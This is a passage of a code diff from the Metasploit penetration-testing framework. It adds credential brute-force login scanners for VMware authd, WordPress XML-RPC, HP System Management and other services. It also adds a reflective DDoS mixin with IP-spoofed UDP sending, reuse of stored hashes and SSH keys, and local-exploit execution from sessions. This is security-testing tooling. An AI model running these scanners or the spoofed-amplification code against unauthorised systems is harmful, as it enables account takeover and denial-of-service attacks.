+            'uri'    => '/proxy/ssllogin',
+            'vars_post' => {
+              'redirecturl'         => '',
+              'redirectquerystring' => '',
+              'user'                => credential.public,
+              'password'            => credential.private
+            }
+          }
+
+          res = nil
+
+          begin
+            cli = Rex::Proto::Http::Client.new(host, port, {}, ssl, ssl_version)
+            cli.connect
+            req = cli.request_cgi(req_opts)
+            res = cli.send_recv(req)
+
+          rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, ::EOFError, ::Timeout::Error
+            result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT)
+            return Result.new(result_opts)
+          end
+
+          if res && res.headers['CpqElm-Login'].to_s =~ /success/
+            result_opts.merge!(status: Metasploit::Model::Login::Status::SUCCESSFUL)
+          else
+            result_opts.merge!(status: Metasploit::Model::Login::Status::INCORRECT)
+          end
+
+          Result.new(result_opts)
+        end
+
+      end
+    end
+  end
+end
@@ -22,7 +22,11 @@ module Metasploit
        # @return [Metasploit::Framework::LoginScanner::Result] The LoginScanner Result object
        def attempt_login(credential)
          result_options = {
-              credential: credential
+              credential: credential,
+              host: host,
+              port: port,
+              protocol: 'udp',
+              service_name: 'snmp'
          }

          [:SNMPv1, :SNMPv2c].each do |version|
@@ -93,7 +93,12 @@ module Metasploit
            end
          end

-          ::Metasploit::Framework::LoginScanner::Result.new(result_options)
+          result = ::Metasploit::Framework::LoginScanner::Result.new(result_options)
+          result.host         = host
+          result.port         = port
+          result.protocol     = 'tcp'
+          result.service_name = 'ssh'
+          result
        end

        private
@@ -48,44 +48,52 @@ module Metasploit
        # (see {Base#attempt_login})
        def attempt_login(credential)
          result_options = {
-              credential: credential
+              credential: credential,
+              host: host,
+              port: port,
+              protocol: 'tcp',
+              service_name: 'telnet'
          }

-          if connect_reset_safe == :refused
-            result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
-          else
-            if busy_message?
-              self.sock.close unless self.sock.closed?
+          begin
+            if connect_reset_safe == :refused
              result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
-            end
-          end
-
-          unless result_options[:status]
-            unless password_prompt?
-              send_user(credential.public)
-            end
-
-            recvd_sample = @recvd.dup
-            # Allow for slow echos
-            1.upto(10) do
-              recv_telnet(self.sock, 0.10) unless @recvd.nil? or @recvd[/#{@password_prompt}/]
-            end
-
-            if password_prompt?(credential.public)
-              send_pass(credential.private)
-
-              # Allow for slow echos
-              1.upto(10) do
-                recv_telnet(self.sock, 0.10) if @recvd == recvd_sample
+            else
+              if busy_message?
+                self.sock.close unless self.sock.closed?
+                result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
              end
            end

-            if login_succeeded?
-              result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
-            else
-              result_options[:status] = Metasploit::Model::Login::Status::INCORRECT
-            end
+            unless result_options[:status]
+              unless password_prompt?
+                send_user(credential.public)
+              end

+              recvd_sample = @recvd.dup
+              # Allow for slow echos
+              1.upto(10) do
+                recv_telnet(self.sock, 0.10) unless @recvd.nil? or @recvd[/#{@password_prompt}/]
+              end
+
+              if password_prompt?(credential.public)
+                send_pass(credential.private)
+
+                # Allow for slow echos
+                1.upto(10) do
+                  recv_telnet(self.sock, 0.10) if @recvd == recvd_sample
+                end
+              end
+
+              if login_succeeded?
+                result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
+              else
+                result_options[:status] = Metasploit::Model::Login::Status::INCORRECT
+              end
+
+            end
+          rescue ::EOFError, Errno::ECONNRESET,  Rex::AddressInUse, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error
+            result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
          end

          ::Metasploit::Framework::LoginScanner::Result.new(result_options)
@@ -0,0 +1,112 @@
+require 'metasploit/framework/login_scanner/base'
+require 'metasploit/framework/login_scanner/rex_socket'
+require 'metasploit/framework/tcp/client'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # This is the LoginScanner class for dealing with vmware-auth.
+      # It is responsible for taking a single target, and a list of credentials
+      # and attempting them. It then saves the results.
+      class VMAUTHD
+        include Metasploit::Framework::LoginScanner::Base
+        include Metasploit::Framework::LoginScanner::RexSocket
+        include Metasploit::Framework::Tcp::Client
+
+        DEFAULT_PORT         = 902
+        LIKELY_PORTS         = [ DEFAULT_PORT, 903, 912 ]
+        LIKELY_SERVICE_NAMES = [ 'vmauthd', 'vmware-auth' ]
+        PRIVATE_TYPES        = [ :password ]
+        REALM_KEY            = nil
+
+        # This method attempts a single login with a single credential against the target
+        # @param credential [Credential] The credential object to attempt to login with
+        # @return [Metasploit::Framework::LoginScanner::Result] The LoginScanner Result object
+        def attempt_login(credential)
+          result_options = {
+            credential: credential,
+            status: Metasploit::Model::Login::Status::INCORRECT,
+            proof: nil,
+            host: host,
+            port: port,
+            service_name: 'vmauthd',
+            protocol: 'tcp'
+          }
+
+          disconnect if self.sock
+
+          begin
+            connect
+            select([sock], nil, nil, 0.4)
+
+            # Check to see if we received an OK?
+            result_options[:proof] = sock.get_once
+            if result_options[:proof] && result_options[:proof][/^220 VMware Authentication Daemon Version.*/]
+              # Switch to SSL if required
+              swap_sock_plain_to_ssl(sock) if result_options[:proof] && result_options[:proof][/SSL/]
+
+              # If we received an OK we should send the USER
+              sock.put("USER #{credential.public}\r\n")
+              result_options[:proof] = sock.get_once
+
+              if result_options[:proof] && result_options[:proof][/^331.*/]
+                # If we got an OK after the username we can send the PASS
+                sock.put("PASS #{credential.private}\r\n")
+                result_options[:proof] = sock.get_once
+
+                if result_options[:proof] && result_options[:proof][/^230.*/]
+                  # if the pass gives an OK, we're good to go
+                  result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
+                end
+              end
+            end
+
+          rescue Rex::ConnectionError, EOFError, Timeout::Error, Errno::EPIPE => e
+            result_options.merge!(
+              proof: e.message,
+              status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+            )
+          end
+
+          disconnect if self.sock
+
+          Result.new(result_options)
+        end
+
+        private
+
+        # (see Base#set_sane_defaults)
+        def set_sane_defaults
+          self.connection_timeout ||= 30
+          self.port               ||= DEFAULT_PORT
+          self.max_send_size      ||= 0
+          self.send_delay         ||= 0
+        end
+
+        def swap_sock_plain_to_ssl(nsock=self.sock)
+          ctx =  generate_ssl_context
+          ssl = OpenSSL::SSL::SSLSocket.new(nsock, ctx)
+
+          ssl.connect
+
+          nsock.extend(Rex::Socket::SslTcp)
+          nsock.sslsock = ssl
+          nsock.sslctx  = ctx
+        end
+
+        def generate_ssl_context
+          ctx = OpenSSL::SSL::SSLContext.new(:SSLv3)
+          @@cached_rsa_key ||= OpenSSL::PKey::RSA.new(1024){}
+
+          ctx.key = @@cached_rsa_key
+
+          ctx.session_id_context = Rex::Text.rand_text(16)
+
+          ctx
+        end
+      end
+
+    end
+  end
+end
@@ -39,9 +39,15 @@ module Metasploit
        # @return [Metasploit::Framework::LoginScanner::Result] The LoginScanner Result object
        def attempt_login(credential)
          result_options = {
-              credential: credential
+              credential: credential,
+              host: host,
+              port: port,
+              protocol: 'tcp',
+              service_name: 'vnc'
          }

+          credential.public = nil
+
          begin
            # Make our initial socket to the target
            disconnect if self.sock
@@ -0,0 +1,80 @@
+require 'metasploit/framework/login_scanner/http'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # Wordpress XML RPC login scanner
+      class WordpressRPC < HTTP
+
+        # (see Base#attempt_login)
+        def attempt_login(credential)
+          http_client = Rex::Proto::Http::Client.new(
+              host, port, {}, ssl, ssl_version
+          )
+
+          result_opts = {
+              credential: credential,
+              host: host,
+              port: port,
+              protocol: 'tcp'
+          }
+          if ssl
+            result_opts[:service_name] = 'https'
+          else
+            result_opts[:service_name] = 'http'
+          end
+
+          begin
+            http_client.connect
+
+            request = http_client.request_cgi(
+                'uri' => uri,
+                'method' => method,
+                'data' => generate_xml_request(credential.public,credential.private),
+            )
+            response = http_client.send_recv(request)
+
+            if response && response.code == 200 && response.body =~ /<value><int>401<\/int><\/value>/ || response.body =~ /<name>user_id<\/name>/
+              result_opts.merge!(status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: response)
+            elsif response.body =~ /<value><int>-32601<\/int><\/value>/
+              result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT)
+            else
+              result_opts.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: response)
+            end
+          rescue ::EOFError, Rex::ConnectionError, ::Timeout::Error
+            result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT)
+          end
+
+          Result.new(result_opts)
+
+        end
+
+        # This method generates the XML data for the RPC login request
+        # @param user [String] the username to authenticate with
+        # @param pass [String] the password to authenticate with
+        # @return [String] the generated XML body for the request
+        def generate_xml_request(user, pass)
+          xml = "<?xml version=\"1.0\" encoding=\"iso-8859-1\"?>"
+          xml << '<methodCall>'
+          xml << '<methodName>wp.getUsers</methodName>'
+          xml << '<params><param><value>1</value></param>'
+          xml << "<param><value>#{user}</value></param>"
+          xml << "<param><value>#{pass}</value></param>"
+          xml << '</params>'
+          xml << '</methodCall>'
+          xml
+        end
+
+        # (see Base#set_sane_defaults)
+        def set_sane_defaults
+          @method = "POST".freeze
+          super
+        end
+
+      end
+    end
+  end
+end
+
+
@@ -173,7 +173,7 @@ module Metasploit
            #Client time
            chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || ''

-            spnopt = {:use_spn => send_spn, :name =>  self.rhost}
+            spnopt = {:use_spn => send_spn, :name =>  rhost}

            resp_lm, resp_ntlm, client_challenge, ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(user, pass, challenge_key,
                                                                                                           domain_name, default_name, default_domain,
@@ -14,8 +14,8 @@ require 'active_support/ordered_options'
 # Project
 #

+require 'metasploit/framework/database'
 require 'metasploit/framework/parsed_options'
-require 'msf/base/config'

 # Options parsed from the command line that can be used to change the
 # `Metasploit::Framework::Application.config` and `Rails.env`
@@ -73,15 +73,7 @@ class Metasploit::Framework::ParsedOptions::Base

      options.database = ActiveSupport::OrderedOptions.new

-      user_config_root = Pathname.new(Msf::Config.get_config_root)
-      user_database_yaml = user_config_root.join('database.yml')
-
-      if user_database_yaml.exist?
-        options.database.config = user_database_yaml.to_path
-      else
-        options.database.config = 'config/database.yml'
-      end
-
+      options.database.config = Metasploit::Framework::Database.configurations_pathname.try(:to_path)
      options.database.disable = false
      options.database.migrations_paths = []

@@ -9,12 +9,14 @@ class Metasploit::Framework::ParsedOptions::Console < Metasploit::Framework::Par
        options.console = ActiveSupport::OrderedOptions.new

        options.console.commands = []
+        options.console.confirm_exit = false
        options.console.defanged = false
        options.console.local_output = nil
        options.console.plugins = []
        options.console.quiet = false
        options.console.real_readline = false
        options.console.resources = []
+        options.console.subcommand = :run
      }
    end

@@ -34,6 +36,10 @@ class Metasploit::Framework::ParsedOptions::Console < Metasploit::Framework::Par
        option_parser.separator ''
        option_parser.separator 'Console options:'

+        option_parser.on('-a', '--ask', "Ask before exiting Metasploit or accept 'exit -y'") do
+          options.console.confirm_exit = true
+        end
+
        option_parser.on('-d', '--defanged', 'Execute the console as defanged') do
          options.console.defanged = true
        end
@@ -49,10 +49,14 @@ module Metasploit
      #
      # @return [void]
      def self.optionally_active_record_railtie
-        optionally(
+        if ::File.exist?(Rails.application.config.paths['config/database'].first)
+          optionally(
            'active_record/railtie',
            'activerecord not in the bundle, so database support will be disabled.'
-        )
+          )
+        else
+          warn 'Could not find database.yml, so database support will be disabled.'
+        end
      end

      # Tries to `require 'metasploit/credential/creation'` and include it in the `including_module`.
@@ -89,4 +93,4 @@ module Metasploit
      end
    end
  end
-end
+end
@@ -3,7 +3,7 @@ module Metasploit
    module Version
      MAJOR = 4
      MINOR = 10
-      PATCH = 0
+      PATCH = 1
      PRERELEASE = 'dev'
    end

@@ -311,8 +311,9 @@ class ReadableText
  #
  # @param mod [Msf::Module] the module.
  # @param indent [String] the indentation to use.
+  # @param missing [Boolean] dump only empty required options.
  # @return [String] the string form of the information.
-  def self.dump_options(mod, indent = '')
+  def self.dump_options(mod, indent = '', missing = false)
    tbl = Rex::Ui::Text::Table.new(
      'Indent'  => indent.length,
      'Columns' =>
@@ -325,13 +326,13 @@ class ReadableText

    mod.options.sorted.each { |entry|
      name, opt = entry
+      val = mod.datastore[name] || opt.default

      next if (opt.advanced?)
      next if (opt.evasion?)
+      next if (missing && opt.valid?(val))

-      val_display = opt.display_value(mod.datastore[name] || opt.default)
-
-      tbl << [ name, val_display, opt.required? ? "yes" : "no", opt.desc ]
+      tbl << [ name, opt.display_value(val), opt.required? ? "yes" : "no", opt.desc ]
    }

    return tbl.to_s
@@ -0,0 +1,33 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/meterpreter'
+require 'msf/base/sessions/meterpreter_java'
+require 'msf/base/sessions/meterpreter_options'
+
+module Msf
+module Sessions
+
+###
+#
+# This class creates a platform-specific meterpreter session type
+#
+###
+class Meterpreter_Java_Android < Msf::Sessions::Meterpreter_Java_Java
+
+  def initialize(rstream, opts={})
+    super
+    self.platform = 'java/android'
+  end
+
+  def load_android
+    original = console.disable_output  
+    console.disable_output = true
+    console.run_single('load android')
+    console.disable_output = original
+  end
+
+end
+
+end
+end
+
@@ -59,6 +59,12 @@ module MeterpreterOptions
      end
    end

+    if session.platform =~ /android/i
+      if datastore['AutoLoadAndroid']
+        session.load_android
+      end
+    end
+
    [ 'InitialAutoRunScript', 'AutoRunScript' ].each do |key|
      if (datastore[key].empty? == false)
        args = Shellwords.shellwords( datastore[key] )
@@ -52,29 +52,65 @@ module Scriptable
  end

  #
-  # Executes the supplied script or Post module with arguments +args+
+  # Executes the supplied script, Post module, or local Exploit module with
+  #   arguments +args+
  #
  # Will search the script path.
  #
  def execute_script(script_name, *args)
    mod = framework.modules.create(script_name)
-    if (mod and mod.type == "post")
+    if mod
      # Don't report module run events here as it will be taken care of
      # in +Post.run_simple+
      opts = { 'SESSION' => self.sid }
      args.each do |arg|
        k,v = arg.split("=", 2)
-        opts[k] = v
+        # case doesn't matter in datastore, but it does in hashes, let's normalize
+        opts[k.downcase] = v
      end
-      mod.run_simple(
-        # Run with whatever the default stance is for now.  At some
-        # point in the future, we'll probably want a way to force a
-        # module to run in the background
-        #'RunAsJob' => true,
-        'LocalInput'  => self.user_input,
-        'LocalOutput' => self.user_output,
-        'Options'     => opts
-      )
+      if mod.type == "post"
+        mod.run_simple(
+          # Run with whatever the default stance is for now.  At some
+          # point in the future, we'll probably want a way to force a
+          # module to run in the background
+          #'RunAsJob' => true,
+          'LocalInput'  => self.user_input,
+          'LocalOutput' => self.user_output,
+          'Options'     => opts
+        )
+      elsif mod.type == "exploit"
+        # well it must be a local, we're not currently supporting anything else
+        if mod.exploit_type == "local"
+          # get a copy of the session exploit's datastore if we can
+          original_exploit_datastore = self.exploit.datastore || {}
+          copy_of_orig_exploit_datastore = original_exploit_datastore.clone
+          # convert datastore opts to a hash to normalize casing issues
+          local_exploit_opts = {}
+          copy_of_orig_exploit_datastore.each do |k,v|
+            local_exploit_opts[k.downcase] = v
+          end
+          # we don't want to inherit a couple things, like AutoRunScript's
+          to_neuter = %w{AutoRunScript InitialAutoRunScript LPORT TARGET}
+          to_neuter.each do |setting|
+            local_exploit_opts.delete(setting.downcase)
+          end
+
+          # merge in any opts that were passed in, defaulting all other settings
+          # to the values from the datastore (of the exploit) that spawned the
+          # session
+          local_exploit_opts = local_exploit_opts.merge(opts)
+
+          new_session = mod.exploit_simple(
+            'Payload'       => local_exploit_opts.delete('payload'),
+            'Target'        => local_exploit_opts.delete('target'),
+            'LocalInput'    => self.user_input,
+            'LocalOutput'   => self.user_output,
+            'Options'       => local_exploit_opts
+            )
+
+        end # end if local
+      end # end if exploit
+
    else
      full_path = self.class.find_script_path(script_name)

@@ -91,4 +127,3 @@ module Scriptable
 end

 end
-
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 module Msf
  module Simple
    module Framework
@@ -60,6 +60,7 @@ require 'msf/core/post'
 # Custom HTTP Modules
 require 'msf/http/wordpress'
 require 'msf/http/typo3'
+require 'msf/http/jboss'

 # Drivers
 require 'msf/core/exploit_driver'
@@ -49,6 +49,53 @@ module Auxiliary::AuthBrute
    @@max_per_service = nil
  end

+  # This method takes a {Metasploit::Framework::CredentialCollection} and prepends existing NTLMHashes
+  # from the database. This allows the users to use the DB_ALL_CREDS option.
+  #
+  # @param [Metasploit::Framework::CredentialCollection]  the credential collection to add to
+  # @return [Metasploit::Framework::CredentialCollection] the modified Credentialcollection
+  def prepend_db_hashes(cred_collection)
+    if datastore['DB_ALL_CREDS'] && framework.db.active
+      creds = Metasploit::Credential::Core.joins(:private).where(metasploit_credential_privates: { type: 'Metasploit::Credential::NTLMHash' }, workspace_id: myworkspace.id)
+      creds.each do |cred|
+        cred_collection.prepend_cred(cred.to_credential)
+      end
+    end
+    cred_collection
+  end
+
+  # This method takes a {Metasploit::Framework::CredentialCollection} and prepends existing SSHKeys
+  # from the database. This allows the users to use the DB_ALL_CREDS option.
+  #
+  # @param [Metasploit::Framework::CredentialCollection]  the credential collection to add to
+  # @return [Metasploit::Framework::CredentialCollection] the modified Credentialcollection
+  def prepend_db_keys(cred_collection)
+    if datastore['DB_ALL_CREDS'] && framework.db.active
+      creds = Metasploit::Credential::Core.joins(:private).where(metasploit_credential_privates: { type: 'Metasploit::Credential::SSHKey' }, workspace_id: myworkspace.id)
+      creds.each do |cred|
+        cred_collection.prepend_cred(cred.to_credential)
+      end
+    end
+    cred_collection
+  end
+
+  # This method takes a {Metasploit::Framework::CredentialCollection} and prepends existing Password Credentials
+  # from the database. This allows the users to use the DB_ALL_CREDS option.
+  #
+  # @param [Metasploit::Framework::CredentialCollection]  the credential collection to add to
+  # @return [Metasploit::Framework::CredentialCollection] the modified Credentialcollection
+  def prepend_db_passwords(cred_collection)
+    if datastore['DB_ALL_CREDS'] && framework.db.active
+      creds = Metasploit::Credential::Core.joins(:private).where(metasploit_credential_privates: { type: 'Metasploit::Credential::Password' }, workspace_id: myworkspace.id)
+      creds.each do |cred|
+        cred_collection.prepend_cred(cred.to_credential)
+      end
+    end
+    cred_collection
+  end
+
+
+
  # Checks all three files for usernames and passwords, and combines them into
  # one credential list to apply against the supplied block. The block (usually
  # something like do_login(user,pass) ) is responsible for actually recording
@@ -0,0 +1,67 @@
+# -*- coding: binary -*-
+module Msf
+
+###
+#
+# This module provides methods for Distributed Reflective Denial of Service (DRDoS) attacks
+#
+###
+module Auxiliary::DRDoS
+
+  def initialize(info = {})
+    super
+    register_advanced_options(
+      [
+        OptAddress.new('SRCIP', [false, 'Use this source IP']),
+        OptInt.new('NUM_REQUESTS', [false, 'Number of requests to send', 1]),
+      ], self.class)
+  end
+
+  def setup
+    super
+    if spoofed? && datastore['NUM_REQUESTS'] < 1
+      raise Msf::OptionValidateError.new(['NUM_REQUESTS']), 'The number of requests must be >= 1'
+    end
+  end
+
+  def prove_amplification(response_map)
+    vulnerable = false
+    proofs = []
+    response_map.each do |request, responses|
+      responses ||= []
+      this_proof = ''
+
+      # compute packet amplification
+      if responses.size > 1
+        vulnerable = true
+        this_proof += "#{responses.size}x packet amplification"
+      else
+        this_proof += 'No packet amplification'
+      end
+
+      this_proof += ' and '
+
+      # compute bandwidth amplification
+      total_size = responses.map(&:size).reduce(:+)
+      bandwidth_amplification = total_size - request.size
+      if bandwidth_amplification > 0
+        vulnerable = true
+        multiplier = total_size / request.size
+        this_proof += "a #{multiplier}x, #{bandwidth_amplification}-byte bandwidth amplification"
+      else
+        this_proof += 'no bandwidth amplification'
+      end
+
+      # TODO (maybe): show the request and responses in more detail?
+      proofs << this_proof
+    end
+
+    [ vulnerable, proofs.join(', ') ]
+  end
+
+  def spoofed?
+    !datastore['SRCIP'].nil?
+  end
+
+end
+end
@@ -5,6 +5,7 @@
 #
 require 'msf/core/auxiliary/auth_brute'
 require 'msf/core/auxiliary/dos'
+require 'msf/core/auxiliary/drdos'
 require 'msf/core/auxiliary/fuzzer'
 require 'msf/core/auxiliary/report'
 require 'msf/core/auxiliary/scanner'
@@ -19,5 +20,7 @@ require 'msf/core/auxiliary/login'
 require 'msf/core/auxiliary/rservices'
 require 'msf/core/auxiliary/cisco'
 require 'msf/core/auxiliary/nmap'
+require 'msf/core/auxiliary/natpmp'
 require 'msf/core/auxiliary/iax2'
+require 'msf/core/auxiliary/ntp'
 require 'msf/core/auxiliary/pii'
@@ -0,0 +1,27 @@
+# -*- coding: binary -*-
+require 'rex/proto/natpmp'
+
+module Msf
+
+###
+#
+# This module provides methods for working with NAT-PMP
+#
+###
+module Auxiliary::NATPMP
+
+  include Auxiliary::Scanner
+  include Rex::Proto::NATPMP
+
+  def initialize(info = {})
+    super
+    register_options(
+      [
+        Opt::RPORT(Rex::Proto::NATPMP::DefaultPort),
+        Opt::CHOST
+      ],
+      self.class
+    )
+  end
+end
+end
@@ -0,0 +1,44 @@
+# -*- coding: binary -*-
+require 'rex/proto/ntp'
+require 'msf/core/exploit'
+module Msf
+
+###
+#
+# This module provides methods for working with NTP
+#
+###
+module Auxiliary::NTP
+
+  include Exploit::Capture
+  include Auxiliary::Scanner
+
+  #
+  # Initializes an instance of an auxiliary module that uses NTP
+  #
+
+  def initialize(info = {})
+    super
+    register_options(
+    [
+      Opt::RPORT(123),
+    ], self.class)
+
+    register_advanced_options(
+      [
+        OptInt.new('VERSION', [true, 'Use this NTP version', 2]),
+        OptInt.new('IMPLEMENTATION', [true, 'Use this NTP mode 7 implementation', 3])
+      ], self.class)
+  end
+
+  # Called for each IP in the batch
+  def scan_host(ip)
+    if spoofed?
+      datastore['ScannerRecvWindow'] = 0
+      scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS'])
+    else
+      scanner_send(@probe, ip, datastore['RPORT'])
+    end
+  end
+end
+end
@@ -230,7 +230,7 @@ module Auxiliary::Report
    end

    case ctype
-    when "text/plain"
+    when /^text\/[\w\.]+$/
      ext = "txt"
    end
    # This method is available even if there is no database, don't bother checking
@@ -69,6 +69,24 @@ module Auxiliary::UDPScanner
    scanner_postscan(batch)
  end

+  # Send a spoofed packet to a given host and port
+  def scanner_spoof_send(data, ip, port, srcip, num_packets=1)
+    open_pcap
+    p = PacketFu::UDPPacket.new
+    p.ip_saddr = srcip
+    p.ip_daddr = ip
+    p.ip_ttl = 255
+    p.udp_src = (rand((2**16)-1024)+1024).to_i
+    p.udp_dst = port
+    p.payload = data
+    p.recalc
+    print_status("Sending #{num_packets} packet(s) to #{ip} from #{srcip}")
+    1.upto(num_packets) do |x|
+      capture_sendto(p, ip)
+    end
+    close_pcap
+  end
+
  # Send a packet to a given host and port
  def scanner_send(data, ip, port)

@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
--- a/Show More
+++ b/Show More